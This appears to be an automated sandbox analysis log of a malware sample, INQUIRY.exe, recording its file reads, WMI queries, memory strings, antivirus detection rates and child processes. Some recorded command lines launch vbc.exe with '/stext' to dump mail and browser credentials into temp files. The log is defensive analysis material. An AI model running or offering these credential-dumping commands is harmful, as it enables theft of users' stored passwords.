                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: INQUIRY.exeVirustotal: Detection: 43%
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Source: INQUIRY.exeVirustotal: Detection: 43%
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
